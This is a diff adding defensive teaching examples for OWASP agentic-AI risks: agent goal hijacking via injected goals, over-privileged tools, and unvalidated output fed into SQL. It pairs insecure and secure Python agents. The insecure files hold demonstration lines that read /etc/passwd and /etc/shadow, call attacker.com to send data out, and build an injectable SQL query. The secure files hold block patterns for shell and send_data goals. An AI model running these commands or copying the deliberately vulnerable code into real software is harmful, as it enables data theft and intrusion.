@@ -0,0 +1,28 @@
# ASI-01: Agent Goal Hijacking

## Vulnerability

An agent without policy enforcement can have its goals modified at runtime through prompt injection or malicious instructions from upstream agents. Without governance controls, the agent blindly executes whatever goal it receives.

**OWASP Reference:** [ASI-01 — Prompt Injection / Agent Hijacking](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)

## Insecure Example (`insecure.py`)

The insecure agent accepts any goal modification without validation:
- No policy checks on incoming goals
- No boundary enforcement on permitted actions
- A malicious upstream agent can redirect the agent to read sensitive files or exfiltrate data

## Secure Example (`secure.py`)

Agent OS Policy Engine enforces runtime governance:
- Goals are validated against a declarative policy file
- Out-of-scope actions are blocked before execution
- All goal changes are logged to an audit trail
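
As a rough illustration of what an audit trail entry for a goal decision could look like, the sketch below builds one JSON line per event using only the standard library. The field names, the `agent.audit` logger name, and both helper functions are assumptions made for this example; they are not the Agent OS `AuditLogger` API.

```python
import json
import logging
from datetime import datetime, timezone

# Hypothetical logger name; route it to a file or log collector as needed.
logger = logging.getLogger("agent.audit")


def audit_record(agent: str, event: str, goal: str, reason: str = "") -> str:
    """Build one JSON line describing a goal decision."""
    return json.dumps(
        {
            "ts": datetime.now(timezone.utc).isoformat(),
            "agent": agent,
            "event": event,  # e.g. "goal_change" or "goal_blocked"
            "goal": goal,
            "reason": reason,
        },
        sort_keys=True,
    )


def log_blocked(agent: str, goal: str, reason: str) -> None:
    """Emit a warning-level audit line for a rejected goal."""
    logger.warning(audit_record(agent, "goal_blocked", goal, reason))
```

Writing one self-describing line per decision keeps blocked attempts searchable later, which is the point of logging goal changes in the first place.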

## Mitigation Strategy

1. Define permitted goals in a YAML policy file
2. Use Agent OS `PolicyEngine` to validate all incoming goals at runtime
3. Enable audit logging for all goal transitions
4. Set `strict_mode: true` to reject any goal not explicitly permitted
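
The steps above can be sketched without any framework. The following is a minimal stand-in that assumes glob-style patterns and a deny-first evaluation order; `validate_goal` and the policy layout are hypothetical and only mirror the fields named in this README, not the actual `PolicyEngine` behavior.

```python
from fnmatch import fnmatchcase

# Hypothetical policy mirroring the fields described above; not the Agent OS schema.
POLICY = {
    "permitted_goals": ["summarize *", "analyze *"],
    "blocked_patterns": ["read_file:*", "send_data:*"],
    "strict_mode": True,
}


def validate_goal(goal: str, policy: dict) -> tuple[bool, str]:
    """Return (allowed, reason) for a goal string under the given policy."""
    normalized = goal.strip().lower()

    # Deny rules are checked first so they win over allow rules.
    for pattern in policy["blocked_patterns"]:
        if fnmatchcase(normalized, pattern):
            return False, f"matches blocked pattern {pattern!r}"

    for pattern in policy["permitted_goals"]:
        if fnmatchcase(normalized, pattern):
            return True, f"matches permitted pattern {pattern!r}"

    # In strict mode, anything not explicitly permitted is rejected.
    if policy.get("strict_mode", True):
        return False, "not explicitly permitted (strict mode)"
    return True, "no rule matched (strict mode off)"


if __name__ == "__main__":
    for goal in ("summarize quarterly report", "read_file: /etc/passwd", "delete logs"):
        print(goal, "->", validate_goal(goal, POLICY))
```

Note that whole-string glob matching is a weak control on its own: a goal such as `summarize report then read_file: /etc/passwd` still matches `summarize *` in this sketch, so pattern checks on goals are best paired with enforcement at the action level.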
@@ -0,0 +1,57 @@
"""
ASI-01: Agent Goal Hijacking — INSECURE EXAMPLE

This agent accepts any goal modification without validation.
A malicious upstream agent can redirect it to exfiltrate data.

WARNING: This code is deliberately insecure for demonstration purposes.
"""


class InsecureAgent:
    """An agent with no policy enforcement, vulnerable to goal hijacking."""

    def __init__(self, name: str):
        self.name = name
        self.current_goal = None

    def set_goal(self, goal: str):
        # No validation: any goal is accepted
        self.current_goal = goal
        print(f"[{self.name}] Goal set to: {goal}")

    def execute(self):
        if not self.current_goal:
            return "No goal set"

        # Agent blindly executes whatever goal it has
        if "read_file" in self.current_goal:
            path = self.current_goal.split("read_file:")[-1].strip()
            with open(path, "r") as f:
                return f.read()

        if "send_data" in self.current_goal:
            # Exfiltration: no checks
            data = self.current_goal.split("send_data:")[-1].strip()
            print(f"[{self.name}] Sending data externally: {data[:50]}...")
            return "Data sent"

        return f"Executed: {self.current_goal}"


if __name__ == "__main__":
    agent = InsecureAgent("data-processor")

    # Normal goal
    agent.set_goal("summarize quarterly report")
    print(agent.execute())

    # Attacker injects a new goal via upstream agent
    agent.set_goal("read_file: /etc/passwd")
    print(agent.execute())

    # Attacker exfiltrates data
    agent.set_goal("send_data: SSN=123-45-6789, CC=4111-1111-1111-1111")
    print(agent.execute())
@@ -0,0 +1,76 @@
"""
ASI-01: Agent Goal Hijacking — SECURE EXAMPLE (Agent OS)

This agent uses Agent OS PolicyEngine to validate all goals against
a declarative policy before execution. Out-of-scope goals are blocked.
"""

from agent_os import PolicyEngine, AuditLogger


POLICY = {
    "agent": "data-processor",
    "version": "1.0",
    "permitted_goals": [
        "summarize *",
        "analyze *",
        "generate_report *",
    ],
    "blocked_patterns": [
        "read_file: /etc/*",
        "read_file: /root/*",
        "send_data:*",
        "execute:*",
        "shell:*",
    ],
    "strict_mode": True,  # Reject anything not explicitly permitted
}


class SecureAgent:
    """An agent with Agent OS policy enforcement, resistant to goal hijacking."""

    def __init__(self, name: str, policy: dict):
        self.name = name
        self.policy_engine = PolicyEngine(policy)
        self.audit = AuditLogger(agent_name=name)
        self.current_goal = None

    def set_goal(self, goal: str) -> bool:
        # Validate goal against policy BEFORE accepting it
        result = self.policy_engine.validate_goal(goal)

        if not result.allowed:
            self.audit.log_blocked(goal=goal, reason=result.reason)
            print(f"[{self.name}] BLOCKED: {goal} ({result.reason})")
            return False

        self.current_goal = goal
        self.audit.log_goal_change(goal=goal)
        print(f"[{self.name}] Goal set to: {goal}")
        return True

    def execute(self):
        if not self.current_goal:
            return "No goal set"

        # Execute only validated goals
        self.audit.log_execution(goal=self.current_goal)
        return f"Executed: {self.current_goal}"


if __name__ == "__main__":
    agent = SecureAgent("data-processor", POLICY)

    # Normal goal: ALLOWED
    agent.set_goal("summarize quarterly report")
    print(agent.execute())

    # Attacker tries to hijack: BLOCKED by policy
    agent.set_goal("read_file: /etc/passwd")

    # Attacker tries exfiltration: BLOCKED
    agent.set_goal("send_data: SSN=123-45-6789, CC=4111-1111-1111-1111")

    # Agent still has the original safe goal
    print(f"Current goal remains: {agent.current_goal}")
@@ -0,0 +1,30 @@
# ASI-02: Excessive Agent Capabilities / Tool Misuse

## Vulnerability

An agent granted unrestricted access to tools (filesystem, network, databases) can perform destructive operations beyond its intended scope. Without capability sandboxing, any agent can read, write, or delete arbitrary resources.

**OWASP Reference:** [ASI-02 — Excessive Agency / Tool Misuse](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)

## Insecure Example (`insecure.py`)

The insecure agent has full filesystem and network access:
- Can read any file on the system
- Can write to any directory
- Can make arbitrary network requests
- No permission boundaries

## Secure Example (`secure.py`)

Agent OS Capability Sandbox restricts agent permissions:
- Ring-based permission model (Ring 0–3) limits scope
- Filesystem access restricted to a virtual sandbox
- Network calls require explicit capability grants
- All tool invocations are audited

## Mitigation Strategy

1. Define capability grants per agent in the policy file
2. Use Agent OS `CapabilitySandbox` to enforce least-privilege access
3. Assign agents to appropriate execution rings (Ring 3 = most restricted)
4. Monitor tool usage with `AuditLogger`
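
To make the least-privilege idea concrete, here is a small sketch of a path check against per-capability glob grants. It assumes POSIX-style paths and normalizes them before matching; `is_allowed` and the `GRANTS` layout are hypothetical illustrations, not the `CapabilitySandbox` implementation.

```python
import posixpath
from fnmatch import fnmatchcase

# Hypothetical grants, shaped like the capability dictionary in secure.py.
GRANTS = {
    "filesystem.read": ["/data/reports/*", "/tmp/workspace/*"],
    "filesystem.write": ["/tmp/workspace/*"],
    "filesystem.delete": [],  # Nothing may be deleted
}


def is_allowed(capability: str, path: str, grants: dict) -> bool:
    """Check a path against the glob patterns granted for a capability."""
    # Collapse "." and ".." segments first so traversal cannot hide
    # behind an allowed prefix.
    normalized = posixpath.normpath(path)
    if not posixpath.isabs(normalized):
        return False  # Relative paths are rejected outright in this sketch.
    patterns = grants.get(capability, [])
    return any(fnmatchcase(normalized, pattern) for pattern in patterns)


if __name__ == "__main__":
    for cap, path in [
        ("filesystem.write", "/tmp/workspace/report.txt"),
        ("filesystem.read", "/tmp/workspace/../../etc/shadow"),
        ("filesystem.delete", "/tmp/workspace/report.txt"),
    ]:
        print(cap, path, "->", is_allowed(cap, path, GRANTS))
```

Normalization handles `..` segments but does not resolve symlinks; a check against a real filesystem would also need something like `os.path.realpath` before matching.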
@@ -0,0 +1,55 @@
"""
ASI-02: Excessive Agent Capabilities — INSECURE EXAMPLE

This agent has unrestricted filesystem and network access.
It can read, write, or delete any resource on the system.

WARNING: This code is deliberately insecure for demonstration purposes.
"""

import os
import shutil
import urllib.request


class InsecureAgent:
    """An agent with no capability restrictions: it can access everything."""

    def __init__(self, name: str):
        self.name = name

    def read_file(self, path: str) -> str:
        # No path validation: can read anything
        with open(path, "r") as f:
            return f.read()

    def write_file(self, path: str, content: str):
        # No write restrictions
        with open(path, "w") as f:
            f.write(content)
        print(f"[{self.name}] Wrote to {path}")

    def delete_path(self, path: str):
        # Can delete anything, even system files
        if os.path.isdir(path):
            shutil.rmtree(path)
        else:
            os.remove(path)
        print(f"[{self.name}] Deleted {path}")

    def fetch_url(self, url: str) -> str:
        # No URL restrictions: can call any external service
        with urllib.request.urlopen(url) as response:
            return response.read().decode()


if __name__ == "__main__":
    agent = InsecureAgent("file-processor")

    # Normal operation
    agent.write_file("/tmp/report.txt", "Q4 summary")

    # But also capable of destructive actions:
    print(agent.read_file("/etc/shadow"))  # Read sensitive files
    agent.delete_path("/tmp/important-data")  # Delete data
    agent.fetch_url("http://attacker.com/exfil?data=secret")  # Exfiltrate
@@ -0,0 +1,77 @@
"""
ASI-02: Excessive Agent Capabilities — SECURE EXAMPLE (Agent OS)

This agent uses Agent OS CapabilitySandbox to enforce least-privilege
access. Only explicitly granted capabilities are permitted.
"""

import urllib.request

from agent_os import CapabilitySandbox, ExecutionRing, AuditLogger


CAPABILITIES = {
    "agent": "file-processor",
    "ring": ExecutionRing.RING_3,  # Most restricted
    "filesystem": {
        "read": ["/data/reports/*", "/tmp/workspace/*"],
        "write": ["/tmp/workspace/*"],
        "delete": [],  # No delete permission
    },
    "network": {
        "allowed_domains": [],  # No network access
    },
}


class SecureAgent:
    """An agent with Agent OS capability sandboxing for least-privilege access."""

    def __init__(self, name: str, capabilities: dict):
        self.name = name
        self.sandbox = CapabilitySandbox(capabilities)
        self.audit = AuditLogger(agent_name=name)

    def read_file(self, path: str) -> str:
        if not self.sandbox.check_permission("filesystem.read", path):
            self.audit.log_blocked(action="read_file", target=path)
            raise PermissionError(f"Read access denied: {path}")

        self.audit.log_access(action="read_file", target=path)
        with open(path, "r") as f:
            return f.read()

    def write_file(self, path: str, content: str):
        if not self.sandbox.check_permission("filesystem.write", path):
            self.audit.log_blocked(action="write_file", target=path)
            raise PermissionError(f"Write access denied: {path}")

        self.audit.log_access(action="write_file", target=path)
        with open(path, "w") as f:
            f.write(content)

    def fetch_url(self, url: str) -> str:
        if not self.sandbox.check_permission("network.fetch", url):
            self.audit.log_blocked(action="fetch_url", target=url)
            raise PermissionError(f"Network access denied: {url}")

        # Audit permitted network calls too, matching the file operations above
        self.audit.log_access(action="fetch_url", target=url)
        with urllib.request.urlopen(url) as response:
            return response.read().decode()


if __name__ == "__main__":
    agent = SecureAgent("file-processor", CAPABILITIES)

    # Permitted: write to workspace
    agent.write_file("/tmp/workspace/report.txt", "Q4 summary")

    # BLOCKED: cannot read sensitive system files
    try:
        agent.read_file("/etc/shadow")
    except PermissionError as e:
        print(f"Blocked: {e}")

    # BLOCKED: no network access granted
    try:
        agent.fetch_url("http://attacker.com/exfil")
    except PermissionError as e:
        print(f"Blocked: {e}")
@@ -0,0 +1,29 @@
# ASI-05: Insecure Output Handling

## Vulnerability

An agent that passes its outputs directly to downstream systems without validation enables injection attacks, data corruption, and privilege escalation. Unvalidated agent output can carry SQL injection, command injection, or other malicious payloads.

**OWASP Reference:** [ASI-05 — Insecure Output Handling](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)

## Insecure Example (`insecure.py`)

The insecure pipeline passes raw agent output to a database:
- Agent output is directly interpolated into SQL queries
- No output sanitization or validation
- Downstream system trusts agent output implicitly
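
The failure mode listed above can be reproduced in a few lines with the standard-library `sqlite3` module. This is a deliberately insecure sketch; the table layout, the sample rows, and `find_reports_unsafe` are assumptions made for the demonstration and are not taken from `insecure.py`.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
conn.executemany(
    "INSERT INTO reports (owner, body) VALUES (?, ?)",
    [("alice", "Q4 summary"), ("bob", "salary data")],
)


def find_reports_unsafe(owner: str) -> list:
    # DELIBERATELY INSECURE: agent output is formatted straight into the SQL text.
    query = f"SELECT owner, body FROM reports WHERE owner = '{owner}'"
    return conn.execute(query).fetchall()


# A well-behaved agent output returns only alice's row.
benign = find_reports_unsafe("alice")

# A manipulated output rewrites the WHERE clause and returns every row.
hijacked = find_reports_unsafe("alice' OR '1'='1")

print(len(benign), len(hijacked))
```

The second call shows why implicit trust is the problem: the database cannot tell which part of the query text came from the developer and which part came from the agent.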

## Secure Example (`secure.py`)

Agent Hypervisor execution rings validate all outputs:
- Output passes through a validation layer before reaching downstream systems
- SQL parameterization enforced automatically
- Content type verification prevents injection attacks
- All outputs are logged for audit

## Mitigation Strategy

1. Use Agent Hypervisor execution rings to enforce output validation
2. Never interpolate agent output directly into queries or commands
3. Define output schemas and validate agent responses against them
4. Log all agent outputs for forensic analysis
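
Steps 2 and 3 can be sketched independently of any hypervisor layer. The example below assumes a simple two-field output schema and uses `sqlite3` placeholders for the write; `validate_output`, `store_report`, and the schema itself are hypothetical names chosen for illustration, not the Agent Hypervisor API.

```python
import re
import sqlite3

# Hypothetical schema: the agent must return exactly "owner" and "body".
OWNER_PATTERN = re.compile(r"[a-z][a-z0-9_]{0,31}")


def validate_output(output: dict) -> dict:
    """Reject agent output that does not match the expected shape."""
    if set(output) != {"owner", "body"}:
        raise ValueError(f"unexpected fields: {sorted(output)}")
    owner, body = output["owner"], output["body"]
    if not isinstance(owner, str) or not OWNER_PATTERN.fullmatch(owner):
        raise ValueError("owner must be a short lowercase identifier")
    if not isinstance(body, str) or len(body) > 10_000:
        raise ValueError("body must be a string of at most 10,000 characters")
    return output


def store_report(conn: sqlite3.Connection, output: dict) -> None:
    record = validate_output(output)
    # Placeholders keep the values out of the SQL text entirely.
    conn.execute(
        "INSERT INTO reports (owner, body) VALUES (?, ?)",
        (record["owner"], record["body"]),
    )


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE reports (owner TEXT, body TEXT)")

# The hostile-looking body is stored as plain text, not executed.
store_report(conn, {"owner": "alice", "body": "Robert'); DROP TABLE reports;--"})
```

Schema validation and parameterization cover different gaps: the first rejects output with the wrong shape, while the second ensures that even accepted values are never parsed as SQL.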